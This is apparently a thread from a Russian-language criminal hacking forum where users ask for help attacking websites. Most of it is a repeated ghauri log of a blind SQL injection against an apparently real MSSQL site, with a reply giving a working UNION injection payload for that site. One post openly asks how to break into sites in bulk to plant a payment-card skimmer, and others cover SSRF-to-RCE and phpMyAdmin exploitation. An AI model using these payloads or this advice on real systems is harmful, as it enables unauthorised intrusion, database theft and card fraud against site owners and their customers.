хэш админа есть ,даже несколько . соли нет и найти не получается
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
прохожу тачку (https://hackerlab.pro/categories/web/8bcb6ff7-a128-443b-b531-5cbcaa1d4a92) (не реклама)
нужно получить админку, при реге выдают jwt токен, реверснув, получаю
{
"is_admin": "false",
"nickname": "test"
}
есть отдельная страница /edit, по видимому, через нее нужно что-то сделать, она позволяет изменить логин и пароль пользователя
попробовал запросом nickname=123&password=123&is_admin, возвращает 500 ошибку
также есть редактор bb кодов
скорее всего есть json inj, через прототипное загрязнение не получается
нужно получить админку, при реге выдают jwt токен, реверснув, получаю
{
"is_admin": "false",
"nickname": "test"
}
есть отдельная страница /edit, по видимому, через нее нужно что-то сделать, она позволяет изменить логин и пароль пользователя
попробовал запросом nickname=123&password=123&is_admin, возвращает 500 ошибку
также есть редактор bb кодов
скорее всего есть json inj, через прототипное загрязнение не получается
посоветуйте что почитать про пентест api ?
помогите пожалуйста с бл*дским акунетикс, в каком формате должны быть данные в csv файле чтобы он целый список схавал? я скоро с ума сойду вручную по 100 штук грузить. в каком бы формате я не давал он не хавает
cvs, в первой колонке должны быть домены, а вторая пустая (описание), до 500 строк
Запятая - разделитель колонок, просто в конце каждого домена добавляешь запятую
https://google.com,скрипт который приобразует txt с доменами в cvs
python script.py domains.txt
Python:
import csv
import sys
import os
if len(sys.argv) < 2:
print('Usage: python program.py <input file>')
sys.exit(1)
input_file = sys.argv[1]
output_file = os.path.splitext(input_file)[0] + '.csv'
with open(input_file, 'r') as f:
addresses = f.read().splitlines()
with open(output_file, 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(['Address', 'Description'])
for address in addresses:
writer.writerow([address, ''])
Последнее редактирование:
Аплодисменты стоя
Кто знает как ограничить в ( Акунетикс ) чтоб проверял по 10 сайтов а не по 20 ?
Знает ли кто возможности эксплуатации pma 5.2.0? Можно ли как то развить атаку имея только его?
Если бы всё было так просто) Нет, если не найдёшь данные от базы.
Поискать можно в забытых бэкапах (типа backup.zip) или через LFI.
Средствами Окуня никак, если есть хотя бы базовые познания в программировании, то написать скрипт который будет это делать через API несложно.
если сменили админку в Wordpress как ее через Sqlmap найти ?
никак. sqlmap это не средство для поиска админок
Подскажите плиз как можно проэксплуатировать blind ssrf
Мало инфы и контекста дал
Гугли "blind ssrf to rce"
PayloadsAllTheThings/Server Side Request Forgery at master · swisskyrepo/PayloadsAllTheThings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings
github.com
Resecurity | Blind SSRF to RCE Vulnerability Exploitation
www.resecurity.com
Escalating Blind SSRF to a Remote Code Execution
Escalating Blind SSRF to a Remote Code Execution
mukibas37.medium.com
CпасибоМало инфы и контекста дал
Гугли "blind ssrf to rce"
PayloadsAllTheThings/Server Side Request Forgery at master · swisskyrepo/PayloadsAllTheThings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThingsgithub.comResecurity | Blind SSRF to RCE Vulnerability Exploitation
www.resecurity.comEscalating Blind SSRF to a Remote Code Execution
Escalating Blind SSRF to a Remote Code Execution
Помогите плиз с ghauri
ghauri -u "https://target.com/genie/default.aspx?mdlno=CC9nPNjnHAq&mfg=Heckler & Koch&pg=list" --batch -p mdlno --dbms mssql -D Admin --tables -v 5 --time-sec=30
[09:22:51] [DEBUG] {'GET': [<Parameter('mdlno')>, <Parameter('mfg')>, <Parameter('Koch')>, <Parameter('pg')>], 'POST': [], 'COOKIE': [], 'HEADER': []}
[09:22:51] [DEBUG] error while checking if value is deserializeble Incorrect padding
[09:22:51] [INFO] testing connection to the target URL
[09:22:51] [TRAFFIC_OUT] HTTP request [#1]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
[09:22:54] [TRAFFIC_IN] HTTP response [#1]:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Frame-Options: sameorigin
X-XSS-Protection: 1
Date: Thu, 24 Apr 2025 13:22:52 GMT
Connection: close
Content-Length: 60054
URI: https://target.com/genie/default.aspx?mdlno=CC9nPNjnHAq&mfg=Heckler & Koch&pg=list
[09:22:54] [DEBUG] parameter 'mdlno' is already tested..
[09:22:54] [DEBUG] ghauri is going to resume target exploitation.
Ghauri resumed the following injection point(s) from stored session:
---
Parameter: mdlno (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: mdlno=CC9nPNjnHAq' OR 06745=6745-- wXyW&mfg=Heckler & Koch&pg=list
Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: mdlno=CC9nPNjnHAq' WAITFOR DELAY '0:0:8'-- wXyW&mfg=Heckler & Koch&pg=list
---
[09:22:54] [INFO] testing Microsoft SQL Server
[09:22:54] [INFO] confirming Microsoft SQL Server
[09:22:54] [INFO] the back-end DBMS is Microsoft SQL Server
[09:22:54] [INFO] fetching tables for database: Admin
[09:22:54] [INFO] fetching number of tables for database 'Admin'
[09:22:54] [DEBUG] fetching number of characters in length of query..
[09:22:54] [PAYLOAD] ' OR LEN(LEN((SELECT LTRIM(STR(COUNT(name))) FROM Admin..sysobjects WHERE xtype IN (CHAR(117),CHAR(118)))))=1-- wXyW
[09:22:54] [TRAFFIC_OUT] HTTP request [#2]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq'%20OR%20LEN(LEN((SELECT%20LTRIM(STR(COUNT(name)))%20FROM%20Admin..sysobjects%20WHERE%20xtype%20IN%20(CHAR(117),CHAR(118)))))=1--%20wXyW&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
[09:22:54] [TRAFFIC_OUT] HTTP request [#2]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq'%20OR%20LEN(LEN((SELECT%20LTRIM(STR(COUNT(name)))%20FROM%20Admin..sysobjects%20WHERE%20xtype%20IN%20(CHAR(117),CHAR(118)))))=1--%20wXyW&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
[09:23:25] [DEBUG] read timeout during connection response reading..
[09:23:25] [TRAFFIC_IN] HTTP response [#2]:
HTTP/1.1 4001 Read Timeout
URI: https://target.com/genie/default.aspx?mdlno=CC9nPNjnHAq' OR LEN(LEN((SELECT LTRIM(STR(COUNT(name))) FROM Admin..sysobjects WHERE xtype IN (CHAR(117),CHAR(118)))))=1-- wXyW&mfg=Heckler & Koch&pg=list
[09:23:25] [PAYLOAD] ' OR LEN(LEN((SELECT LTRIM(STR(COUNT(name))) FROM Admin..sysobjects WHERE xtype IN (CHAR(117),CHAR(118)))))=2-- wXyW
[09:23:25] [TRAFFIC_OUT] HTTP request [#3]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq'%20OR%20LEN(LEN((SELECT%20LTRIM(STR(COUNT(name)))%20FROM%20Admin..sysobjects%20WHERE%20xtype%20IN%20(CHAR(117),CHAR(118)))))=2--%20wXyW&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
До этого крутился нормально вывел 24 базы,а дальше вот Read Timeout , вручную проверил скулю не закрыли,не могу понять что с ним не так ,и он 24 слова ну около суток собирал
а когда базы собирает ну названия баз он нормально 200 ответы
[09:31:29] [TRAFFIC_OUT] HTTP request [#7]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq'%20OR%20LEN(LEN((SELECT%20LTRIM(STR(COUNT(name)))%20FROM%20master..sysdatabases)))=1--%20wXyW&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
[09:31:36] [TRAFFIC_IN] HTTP response [#7]:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Frame-Options: sameorigin
X-XSS-Protection: 1
Date: Thu, 24 Apr 2025 13:31:35 GMT
Connection: close
Content-Length: 105465
URI: https://target.com/genie/default.as...abases)))=1-- wXyW&mfg=Heckler & Koch&pg=list
[09:31:37] [DEBUG] possible injectable cases detected: 'Page Content'
[09:31:37] [PAYLOAD] ' OR LEN(LEN((SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases)))=2-- wXyW
[09:31:37] [TRAFFIC_OUT] HTTP request [#8]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq'%20OR%20LEN(LEN((SELECT%20LTRIM(STR(COUNT(name)))%20FROM%20master..sysdatabases)))=2--%20wXyW&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
[09:31:43] [TRAFFIC_IN] HTTP response [#8]:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Frame-Options: sameorigin
X-XSS-Protection: 1
Date: Thu, 24 Apr 2025 13:31:42 GMT
Connection: close
Content-Length: 60334
URI: https://target.com/genie/default.as...abases)))=2-- wXyW&mfg=Heckler & Koch&pg=list
[09:31:43] [PAYLOAD] ' OR LEN(LEN((SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases)))=3-- wXyW
[09:31:43] [TRAFFIC_OUT] HTTP request [#9]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq'%20OR%20LEN(LEN((SELECT%20LTRIM(STR(COUNT(name)))%20FROM%20master..sysdatabases)))=3--%20wXyW&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
ghauri -u "https://target.com/genie/default.aspx?mdlno=CC9nPNjnHAq&mfg=Heckler & Koch&pg=list" --batch -p mdlno --dbms mssql -D Admin --tables -v 5 --time-sec=30
[09:22:51] [DEBUG] {'GET': [<Parameter('mdlno')>, <Parameter('mfg')>, <Parameter('Koch')>, <Parameter('pg')>], 'POST': [], 'COOKIE': [], 'HEADER': []}
[09:22:51] [DEBUG] error while checking if value is deserializeble Incorrect padding
[09:22:51] [INFO] testing connection to the target URL
[09:22:51] [TRAFFIC_OUT] HTTP request [#1]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
[09:22:54] [TRAFFIC_IN] HTTP response [#1]:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Frame-Options: sameorigin
X-XSS-Protection: 1
Date: Thu, 24 Apr 2025 13:22:52 GMT
Connection: close
Content-Length: 60054
URI: https://target.com/genie/default.aspx?mdlno=CC9nPNjnHAq&mfg=Heckler & Koch&pg=list
[09:22:54] [DEBUG] parameter 'mdlno' is already tested..
[09:22:54] [DEBUG] ghauri is going to resume target exploitation.
Ghauri resumed the following injection point(s) from stored session:
---
Parameter: mdlno (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: mdlno=CC9nPNjnHAq' OR 06745=6745-- wXyW&mfg=Heckler & Koch&pg=list
Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: mdlno=CC9nPNjnHAq' WAITFOR DELAY '0:0:8'-- wXyW&mfg=Heckler & Koch&pg=list
---
[09:22:54] [INFO] testing Microsoft SQL Server
[09:22:54] [INFO] confirming Microsoft SQL Server
[09:22:54] [INFO] the back-end DBMS is Microsoft SQL Server
[09:22:54] [INFO] fetching tables for database: Admin
[09:22:54] [INFO] fetching number of tables for database 'Admin'
[09:22:54] [DEBUG] fetching number of characters in length of query..
[09:22:54] [PAYLOAD] ' OR LEN(LEN((SELECT LTRIM(STR(COUNT(name))) FROM Admin..sysobjects WHERE xtype IN (CHAR(117),CHAR(118)))))=1-- wXyW
[09:22:54] [TRAFFIC_OUT] HTTP request [#2]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq'%20OR%20LEN(LEN((SELECT%20LTRIM(STR(COUNT(name)))%20FROM%20Admin..sysobjects%20WHERE%20xtype%20IN%20(CHAR(117),CHAR(118)))))=1--%20wXyW&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
[09:22:54] [TRAFFIC_OUT] HTTP request [#2]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq'%20OR%20LEN(LEN((SELECT%20LTRIM(STR(COUNT(name)))%20FROM%20Admin..sysobjects%20WHERE%20xtype%20IN%20(CHAR(117),CHAR(118)))))=1--%20wXyW&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
[09:23:25] [DEBUG] read timeout during connection response reading..
[09:23:25] [TRAFFIC_IN] HTTP response [#2]:
HTTP/1.1 4001 Read Timeout
URI: https://target.com/genie/default.aspx?mdlno=CC9nPNjnHAq' OR LEN(LEN((SELECT LTRIM(STR(COUNT(name))) FROM Admin..sysobjects WHERE xtype IN (CHAR(117),CHAR(118)))))=1-- wXyW&mfg=Heckler & Koch&pg=list
[09:23:25] [PAYLOAD] ' OR LEN(LEN((SELECT LTRIM(STR(COUNT(name))) FROM Admin..sysobjects WHERE xtype IN (CHAR(117),CHAR(118)))))=2-- wXyW
[09:23:25] [TRAFFIC_OUT] HTTP request [#3]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq'%20OR%20LEN(LEN((SELECT%20LTRIM(STR(COUNT(name)))%20FROM%20Admin..sysobjects%20WHERE%20xtype%20IN%20(CHAR(117),CHAR(118)))))=2--%20wXyW&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
До этого крутился нормально вывел 24 базы,а дальше вот Read Timeout , вручную проверил скулю не закрыли,не могу понять что с ним не так ,и он 24 слова ну около суток собирал
а когда базы собирает ну названия баз он нормально 200 ответы
[09:31:29] [TRAFFIC_OUT] HTTP request [#7]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq'%20OR%20LEN(LEN((SELECT%20LTRIM(STR(COUNT(name)))%20FROM%20master..sysdatabases)))=1--%20wXyW&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
[09:31:36] [TRAFFIC_IN] HTTP response [#7]:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Frame-Options: sameorigin
X-XSS-Protection: 1
Date: Thu, 24 Apr 2025 13:31:35 GMT
Connection: close
Content-Length: 105465
URI: https://target.com/genie/default.as...abases)))=1-- wXyW&mfg=Heckler & Koch&pg=list
[09:31:37] [DEBUG] possible injectable cases detected: 'Page Content'
[09:31:37] [PAYLOAD] ' OR LEN(LEN((SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases)))=2-- wXyW
[09:31:37] [TRAFFIC_OUT] HTTP request [#8]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq'%20OR%20LEN(LEN((SELECT%20LTRIM(STR(COUNT(name)))%20FROM%20master..sysdatabases)))=2--%20wXyW&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
[09:31:43] [TRAFFIC_IN] HTTP response [#8]:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Frame-Options: sameorigin
X-XSS-Protection: 1
Date: Thu, 24 Apr 2025 13:31:42 GMT
Connection: close
Content-Length: 60334
URI: https://target.com/genie/default.as...abases)))=2-- wXyW&mfg=Heckler & Koch&pg=list
[09:31:43] [PAYLOAD] ' OR LEN(LEN((SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases)))=3-- wXyW
[09:31:43] [TRAFFIC_OUT] HTTP request [#9]:
GET /genie/default.aspx?mdlno=CC9nPNjnHAq'%20OR%20LEN(LEN((SELECT%20LTRIM(STR(COUNT(name)))%20FROM%20master..sysdatabases)))=3--%20wXyW&mfg=Heckler%20&%20Koch&pg=list HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: target.com
Cache-Control: no-cache
Accept: /
Accept-Encoding: none
Connection: close
Последнее редактирование:
Всех приветствую!
У меня цель получить доступ к сайту и поставить сниффер карт.
Вопросы:
Буду рад каждому ответу!
У меня цель получить доступ к сайту и поставить сниффер карт.
Вопросы:
- Что бы это сделать, какого уровня доступ мне нужен(понимаю что звучит глупо) и какой вектор атаки выбрать?
- Как массово собрать цели? Тут не понимаю как правильно поступить, искать парсер url или сканировать IP диапазоны нмапом на наличие 80 и 8080 порта и рыться уже в этом.
Буду рад каждому ответу!
Цель:
Получить доступ к сайту и поставить сниффер карт.
Вопросы:
- Что бы это сделать, какого уровня доступ мне нужен(понимаю что звучит глупо) и какой вектор атаки выбрать?
- Как массово собрать цели? Тут непонимаю как правило поступить, искать парсер url или сканировать IP диапазоны нмапом на наличие 80 и 8080 порта и рыться уже в этом.
Буду рад каждому ответу!
Получить доступ к сайту и поставить сниффер карт.
Вопросы:
- Что бы это сделать, какого уровня доступ мне нужен(понимаю что звучит глупо) и какой вектор атаки выбрать?
- Как массово собрать цели? Тут непонимаю как правило поступить, искать парсер url или сканировать IP диапазоны нмапом на наличие 80 и 8080 порта и рыться уже в этом.
Буду рад каждому ответу!
1. Будь внимательнее.
2. Если скрываешь домен, то и скрывай полностью URL .
3. Там есть union.
4. Так же есть стейк.
mdlno=CC9nPNjnHAq' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(120)+CHAR(113)+CHAR(77)+CHAR(67)+CHAR(112)+CHAR(115)+CHAR(102)+CHAR(70)+CHAR(83)+CHAR(87)+CHAR(106)+CHAR(101)+CHAR(122)+CHAR(105)+CHAR(89)+CHAR(112)+CHAR(81)+CHAR(118)+CHAR(65)+CHAR(110)+CHAR(110)+CHAR(121)+CHAR(119)+CHAR(97)+CHAR(83)+CHAR(83)+CHAR(88)+CHAR(78)+CHAR(110)+CHAR(73)+CHAR(106)+CHAR(108)+CHAR(108)+CHAR(78)+CHAR(100)+CHAR(74)+CHAR(103)+CHAR(75)+CHAR(116)+CHAR(115)+CHAR(74)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GVqq&mfg=Heckler & Koch&pg=list
p.s. А чем тебе sqlmap не угодил?